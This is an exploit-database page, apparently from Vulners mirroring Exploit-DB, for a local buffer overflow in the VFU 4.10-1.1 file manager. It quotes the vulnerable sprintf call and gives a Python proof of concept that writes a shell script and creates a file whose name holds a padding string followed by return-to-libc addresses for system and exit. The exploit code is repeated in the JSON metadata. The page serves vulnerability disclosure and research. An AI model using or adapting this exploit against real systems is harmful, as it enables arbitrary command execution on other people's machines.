Search...

VFU 4.10-1.1 - Move Entry Buffer Overflow

2015-02-25T00:00:00

ID EDB-ID:36229
Type exploitdb
Reporter Bas van den Berg
Modified 2015-02-25T00:00:00

Description

VFU 4.10-1.1 - Move Entry Buffer Overflow. Local exploit for linux platform

                                        
                                            # Exploit Title: VFU Move Entry Buffer Overflow
# Date: 2015-02-25
# Exploit Author: Bas van den Berg -- @barrebas
# Vendor Homepage: http://cade.datamax.bg/
# Software Link: http://cade.datamax.bg/vfu/#download
# Version: 4.10-1.1
# Tested on: GNU/Linux Kali 1.09 32-bit & Crunchbang 11 Waldorf (based on Debian Wheezy), kernel 3.2.0-4

# VFU 4.10 (probably up to 4.14) contains a buffer overflow when a user
# moves a file entry around with a large filename. To trigger this 
# vulnerability, extensive user interaction is required.
# Steps to reproduce the bug: create a file with a large (&gt;115 
# characters), run VFU and select 'A' and then 'V' to move the large 
# file entry around. Upon confirming the entry move, VFU crashes due to 
# a buffer overflow in this function:

'''
void vfu_file_entry_move()
{
  char t[128];
  sprintf( t, "MOVE/REORDER File entry: %s", files_list[FLI]-&gt;name() );
  say1( t );
  say2( "Use Up/Down Arrows to reorder, ESC,ENTER when done." );
'''

# This overflow allows execution of arbitrary commands with the 
# privilege of the current user. The attached PoC demonstrates this. It 
# drops two files: the large filename and a shellscript that allows 
# arbitrary command execution. Usage: $ python vfu-move-entry-poc.py


import struct
import os

def p(x):
	return struct.pack('&lt;L', x & 0xffffffff)

with open('./vstring.h', 'w') as f:
	f.write('#!/bin/sh\ntouch pwned')
	f.close()
os.chmod('./vstring.h', 0755)

payload = "A"*115
payload += p(0x8049ca0) # system@plt
payload += p(0x804a260) # exit@plt
payload += p(0x8088e44) # -&gt; ./vstring.h

open(payload, 'w').close()

JSON Vulners Source

Initial Source

{"hash": "69523f681a13c4a538731ea69de5d092e6f184526761221b6608b39f1a19605d", "id": "EDB-ID:36229", "lastseen": "2016-02-04T03:01:56", "enchantments": {"vulnersScore": 7.2}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/36229/", "description": "VFU 4.10-1.1 - Move Entry Buffer Overflow. Local exploit for linux platform", "title": "VFU 4.10-1.1 - Move Entry Buffer Overflow", "sourceData": "# Exploit Title: VFU Move Entry Buffer Overflow\r\n# Date: 2015-02-25\r\n# Exploit Author: Bas van den Berg -- @barrebas\r\n# Vendor Homepage: http://cade.datamax.bg/\r\n# Software Link: http://cade.datamax.bg/vfu/#download\r\n# Version: 4.10-1.1\r\n# Tested on: GNU/Linux Kali 1.09 32-bit & Crunchbang 11 Waldorf (based on Debian Wheezy), kernel 3.2.0-4\r\n\r\n# VFU 4.10 (probably up to 4.14) contains a buffer overflow when a user\r\n# moves a file entry around with a large filename. To trigger this \r\n# vulnerability, extensive user interaction is required.\r\n# Steps to reproduce the bug: create a file with a large (>115 \r\n# characters), run VFU and select 'A' and then 'V' to move the large \r\n# file entry around. Upon confirming the entry move, VFU crashes due to \r\n# a buffer overflow in this function:\r\n\r\n'''\r\nvoid vfu_file_entry_move()\r\n{\r\n char t[128];\r\n sprintf( t, \"MOVE/REORDER File entry: %s\", files_list[FLI]->name() );\r\n say1( t );\r\n say2( \"Use Up/Down Arrows to reorder, ESC,ENTER when done.\" );\r\n'''\r\n\r\n# This overflow allows execution of arbitrary commands with the \r\n# privilege of the current user. The attached PoC demonstrates this. It \r\n# drops two files: the large filename and a shellscript that allows \r\n# arbitrary command execution. Usage: $ python vfu-move-entry-poc.py\r\n\r\n\r\nimport struct\r\nimport os\r\n\r\ndef p(x):\r\n\treturn struct.pack('<L', x & 0xffffffff)\r\n\r\nwith open('./vstring.h', 'w') as f:\r\n\tf.write('#!/bin/sh\\ntouch pwned')\r\n\tf.close()\r\nos.chmod('./vstring.h', 0755)\r\n\r\npayload = \"A\"*115\r\npayload += p(0x8049ca0) # system@plt\r\npayload += p(0x804a260) # exit@plt\r\npayload += p(0x8088e44) # -> ./vstring.h\r\n\r\nopen(payload, 'w').close()\r\n", "objectVersion": "1.0", "cvelist": [], "published": "2015-02-25T00:00:00", "osvdbidlist": ["104985"], "references": [], "reporter": "Bas van den Berg", "modified": "2015-02-25T00:00:00", "href": "https://www.exploit-db.com/exploits/36229/"}